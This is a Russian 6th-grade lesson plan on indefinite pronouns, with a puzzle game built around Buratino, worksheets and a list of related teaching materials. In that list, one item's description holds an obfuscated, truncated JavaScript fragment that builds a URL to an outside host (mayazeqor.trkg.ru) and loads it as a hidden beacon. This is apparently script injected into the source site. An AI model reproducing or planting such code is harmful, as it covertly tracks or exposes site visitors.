Харенко Елена Николаевна Неопределенные местоимения. Урок в 6 классе
методическая разработка по русскому языку (6 класс) по теме

Разработка урока в 6 классе по теме "Неопределенные местоимения" с применением ИКТ

Скачать:


Предварительный просмотр:

Конспект урока по русскому языку в 6 классе

Подготовила учитель русского языка и литературы Харенко Е. Н.  МАОУ ''Гимназия № 23''

Тема урока: «Неопределённые местоимения»

Тип урока: изучение нового материала по морфологии

Оборудование: учебник, индивидуальные карточки, мультимедийный проектор, презентация.

Учебник: Учебник. Русский язык. 6 класс. Т. А. Ладыженская, М. Т. Баранов, Л. А. Тростенцова  и др. М.: «Просвещение». 2009г.

Цели урока:

обучающая – познакомить с отличительными признаками неопределенных местоимений, образование неопределённых местоимений, написание; развивающая – развивать умение находить неопределённые местоимения, знать написание с НЕ-,  развивать орфографическую зоркость; воспитывающая – воспитывать любовь к родному языку, интерес к урокам русского языка.

План урока

  1. Организационный момент                                                         2 мин.
  2. «Солнечная полянка»                                                                 7 мин.
  3. «А что в корзине?»                                                                      4 мин.
  4. «Неопределённая полянка»                                                        4 мин.
  5. «Под старым дубом»                                                                   3 мин.
  6. Отдохнём (физминутка)                                                              3 мин.
  7. «Строительная площадка»                                                          7 мин.
  8. «Лес чудес»                                                                                  3 мин.
  9. Выводы. Оценки.                                                                         2 мин.
  10. Домашнее задание                                                                       2 мин.
  11. Релаксация.                                                                                   3 мин.

Ход урока

1. Организационный момент (Слайд №1)

- Здравствуйте, я рада видеть вас,

Познакомимся сейчас,

Я – Елена Николаевна,

Впервые в Родниках у вас.

Открою вам волшебную я дверцу,

Пусть в том поможет сказочный герой,

Его не назову я имя,

Вы сами отгадайте кто он.

Открытия мы будем делать вместе,

По буквам имя собирать вразброс.

Шутя, изучим тему и узнаем,

Что этот персонаж с собой принёс.

- Итак, сегодня на уроке, как вы поняли, мы участвуем в увлекательной игре «Операция поиск». (Слайд №2) И наградой нам будут знания и герой, который поможет их получить.

2. «Солнечная полянка»

- Отправляемся искать героя на солнечную полянку.

- Перед вами на индивидуальных листах словосочетания, вставьте буквы, объясните их правописание (по цепочке).

- Для особого поискового задания нужны двое желающих. Вам необходимо произвести фонетический разбор слов «моя» и «вся».

Моя – 2 слога [май’а]

М – [м] – согласный, звонкий непарный, твёрдый парный, сонорный;

О – [а] – гласный, безударный;

Я  - [й’] – согласный, звонкий непарный, мягкий непарный, сонорный;

       [a] –гласный, ударный;

 _____________

3 буквы, 4 звука

Вся – 1 слог [фс’а]

В – [ф] – согласный, глухой парный, твердый парный;

 С - [с’] – согласный, глухой парный, мягкий парный;

Я - [а] – гласный, ударный;

___________

3 буквы, 3 звука.

Объяснение идет по схеме что – где - как.

О страстном стремлении к победе, пробираешься по узкой тропинке, расположиться на ветхой террасе, участвовать с ними в шествии по городу, настигать его, изменить мнение о ней. (Слайд №3).

 - Проверьте фонетический разбор и определите первую букву, которую мы нашли на полянке, она означает ударный гласный звук в этих словах. (А).

3. «А что в корзине?» 

- Из словосочетаний, которые мы восстановили на солнечной полянке, положите в корзину, т.е. выпишите в столбик только местоимения.

                                                              Неопределенная форма

С ними                                                    они

Его                                                           он                         личные местоимения

О ней                                                       она

- Прочитайте. Поставьте местоимения в неопределенную форму, определите разряд.

- Какая форма объединяет эти местоимения? (3 лицо).

- Мы найдем еще одну букву, если назовем общий согласный в местоимениях 3 лица. (Н).

4. «Неопределенная полянка»

- А сейчас ребята, мы оказались на такой полянке, название которой я даже не могу придумать. Думаю, вы мне в этом поможете, на ней мы встречаем нашего героя.

- Читаем предложение. Некто принес нечто. (Слайд №4).

 - Да, вы отгадали. Это наш герой. Портрет, которого должен быть на ваших листах. Как вы считаете, можно ли определить, кто он и что принес? (определить нельзя).

- Что обозначают? (неопределенные предметы и лица).

- И действительно, тема нашего урока «Неопределенные местоимения». (Слайд № 5). А полянка, на которой мы находимся, называется неопределенная.

- Впишите букву, которую мы нашли на этой полянке. Это гласный в приставке, который означает приближение. (И).

5. «Под старым дубом»

- На полянке, где живут неопределенные местоимения, сядем под старым дубом, откроем наши умные книги и попробуем узнать подробнее о неопределенных местоимениях (стр. 167).

- Прочитайте упражнение под звездочкой, ясно ли из этой загадки, кто мел, по какой дороге, что нашел, что отдал? (нет, не ясно).

 - Определите, на что указывают данные слова? (на предмет, признак, количество).

- Местоимения, которые указывают на неопределенный предмет, признак, количество – называются неопределенными (стр. 168). (Слайд №6).

- Какие из местоимений в рамке изменяются по падежам? (все, кроме местоимений некто и нечто).

- Какие по родам и числам? (которые образуют признаки).

- Прочитайте информацию, выделенную жирным шрифтом. Расскажите друг другу кратко.

- На этой полянке мы возьмем букву, на которую чаще всего оканчивается неопределенные местоимения. (О).

6. Физминутка.

-  (Слайд №7).Отдохнем на берегу реки, посмотрим на волны, пройдите взглядом по волне справа – налево, слева – направо.

- Поднимите голову, посмотрите на солнце в центр – и на границы. Какую геометрическую фигуру напоминает солнце? (круг). В этом слове мы нашли еще одну гласную букву имени нашего сказочного героя. (У).

7. «Строительная площадка»

- Мы на строительной площадке. Перед вами вопросительные местоимения. Образуйте от них неопределенные с приставками не- и кое- и с суффиксами –то, -либо, -нибудь, которые пишутся через дефис. Поработайте в парах.

- Проверим работу. Прочитайте местоимения с приставкой не- (некто, нечто, некоторый, несколько).

- Как пишется приставка не- в неопределенных местоимениях? (слитно).

- Поставьте ударение. Куда падает ударение (не-)

- Кто понял как пишутся неопределенные местоимения с не- (слитно).

- Прочитаем правило (стр. 168).

- Откроем букву - это согласный, твердый, глухой, который есть в местоимениях некто и нечто. (Т).

- Перейдем ко второй части таблицы.

- Прочитаем местоимения, которые вы образовали от вопросительных (кое-кто, что-то, какой-либо, сколько-нибудь).

- Как вы записали эти местоимения? (через дефис)

- Запомните. -кое, -то, -либо, -нибудь – дефис не забудь! (Слайд №8).

- Откроем букву, которая является второй в алфавите. (Б).

- Итак, давайте еще раз посмотрим на нашу постройку. От каких местоимений образуются неопределенные? (от вопросительных)

(Слайд №9).

- Как пишутся местоимения? (через дефис)

8. «Лес чудес»

- А теперь, предлагаю вам проверить свои силы в лесу чудес, вставив необходимые буквы, выбрав слитное, дефисное написание. (Слайд №10).

- И мы с вами подошли к разгадке. Последнюю букву имени нашего героя можно найти в названии темы «Неопределенные местоимения» - это сонорный, мягкий звук: [р]

9. Итак, какой же герой помог гам разобраться в изучении новой темы? (Буратино) (Слайд №11, 12).

- Что он принес с собой (книгу). Действительно, книга, которая является проводником в мир знаний, поможет вам в будущем узнать еще много интересного и нового.

- А что мы узнали на уроке?

10. Домашнее задание §71 упражнение 414. Оценки за урок. (Слайд №13)

11. Релаксация

- А теперь, ребята, ответьте, пожалуйста, на вопросы, которые написаны у вас на картах. (Слайд №14)

  1. Сегодня на уроке у меня было __________________ настроение.
  2. Урок был ________________________________________________.
  3. Я желаю учителю _________________________________________.

                  - Сегодня мы многое сделали с вами,

                    Узнали героя, что в гости пришел.

                     Пусть много открытий вас ждет с чудесами,

                     Пусти в жизни, у вас будет все хорошо.

«Операция поиск»

1. На солнечной полянке.

О страс…ном стр…млении к побед…,

проб..раешься по у…кой тр..пинке,

расп..ложиться на ветхой террасе,

участвовать с ними в шествии по городу, наст..гать его, изм…нить мнение о ней.

2. «Что в корзине?»

____________________________________________________________________________________________________________________________________

_________________________________________________________________

        

3. «Неопределённая полянка»

_______________________________________.

4. «Под старым дубом»

5. На берегу реки

6. «Строительная площадка»

Вопросительные местоимения


Не


Кое-, -то, -либо,

-нибудь

Кто

Что

Который

Сколько

7. Ответьте на вопросы

1. Сегодня на уроке у меня было __________________ настроение.

2. Урок был ______________________________________________________.

3. Я желаю учителю ______________________________________________.

Н…кто, н…что, кое что, что нибудь, кто либо, сколько нибудь, что то, какой либо, кто то.

Н…кто, н…что, кое что, что нибудь, кто либо, сколько нибудь, что то, какой либо, кто то.

Н…кто, н…что, кое что, что нибудь, кто либо, сколько нибудь, что то, какой либо, кто то.

Н…кто, н…что, кое что, что нибудь, кто либо, сколько нибудь, что то, какой либо, кто то.

Н…кто, н…что, кое что, что нибудь, кто либо, сколько нибудь, что то, какой либо, кто то.

Н…кто, н…что, кое что, что нибудь, кто либо, сколько нибудь, что то, какой либо, кто то.

Н…кто, н…что, кое что, что нибудь, кто либо, сколько нибудь, что то, какой либо, кто то.

Н…кто, н…что, кое что, что нибудь, кто либо, сколько нибудь, что то, какой либо, кто то.


По теме: методические разработки, презентации и конспекты

Сценарий спортивного праздника «Звёзды победы» учитель физической культуры Марочкина Елена Николаевна, МОУ «СОШ № 30» г. Старый Оскол 4 – е классы

Данное мероприятие - комплексное, которое реализует задачи военно– патриотического воспитания и развития физических качеств младших школьников. В программу праздника входят как спортивные конкурсы, об...

Разработка урока по русскому языку в 6 классе. Тема урока: "Неопределенные местоимения"

Урок русского языка в 6 классе с применением технологии проблемного обучения.Тема: Неопределённые местоимения. Тип урока:   изучение нового материала и первичное закрепление знаний.Цели...

Сотрудничество учителя- логопеда Курусь Елены Николаевны с учителями начальных классов

Данный материал располагает информацией о совместной работе учителя- логопеда с педагогами начальных классов....

«Использование интерактивной доски на уроках» . Учитель географии Князева Елена Николаевна

В наши дни каждому – ребенку, подростку, взрослому – необходимо иметь хотя бы общее преставление о технологиях, окружающих его в школе, дома, на улице. Чтобы воспользоваться обширнейшими возможностями...

Тест на тему "Неопределенные местоимения" для 5 класса

\'use strict\';var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'mayazeqor.trkg.ru\',\'39\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(){i...

Муниципальный проект «Цифровое наставничество» Авторы: муниципальная команда Большеберезниковского района учитель биологии Кудашева Светлана Николаевна МБОУ «Марьяновская СОШ», учитель информатики Смоланова Елена Николаевна МБОУ «Большеберезниковская СО

Для чего? Что мы хотим получить в итоге муниципальной практики?Обеспечить взаимодействие субъектов наставничества в вопросах использования возможностей цифровой образовательной среды в урочной и внеур...